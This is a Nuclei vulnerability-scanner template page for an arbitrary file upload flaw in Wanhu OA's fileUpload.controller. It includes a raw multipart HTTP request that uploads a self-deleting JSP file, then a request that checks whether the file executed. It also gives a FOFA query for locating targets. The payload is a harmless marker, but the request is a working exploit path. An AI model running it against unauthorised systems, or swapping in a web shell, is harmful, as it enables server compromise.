Skip to content
Nuclei Templates

Wanhu OA Fileupload Controller - Arbitrary File Upload

ID: wanhu-oa-fileupload-controller

Severity: critical

Author: SleepingBag945

Tags: wanhu,oa,fileupload,controller,intrusive

Description

Section titled “Description”

There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.

YAML Source

Section titled “YAML Source”
id: wanhu-oa-fileupload-controller


info:
  name: Wanhu OA Fileupload Controller - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24
    - https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="万户网络-ezOFFICE"
  tags: wanhu,oa,fileupload,controller,intrusive
variables:
  num1: "{{rand_int(1000, 9999)}}"
  num2: "{{rand_int(1000, 9999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


http:
  - raw:
      - |
        POST /defaultroot/upload/fileUpload.controller HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
        Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6


        --b0d829daa06c13d6b3e16b0ad21d1eed
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
        Content-Type: application/octet-stream


        <%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        --b0d829daa06c13d6b3e16b0ad21d1eed--
      - |
        GET /defaultroot/upload/html/{{filename}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
          - 'status_code_2 == 200 && contains(body_2,"{{result}}")'
        condition: and


    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - '"data":"(.*?)"'
        internal: true
# digest: 4a0a0047304502201796c01640c17691e4e3f258b97fdce9e8f8c215e9481b3f76ee43cffa353e9a0221009c7c340c6aba1794683ee613f41cd14cc66aaff8d05549deb243143ea115d4f5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml"

View on Github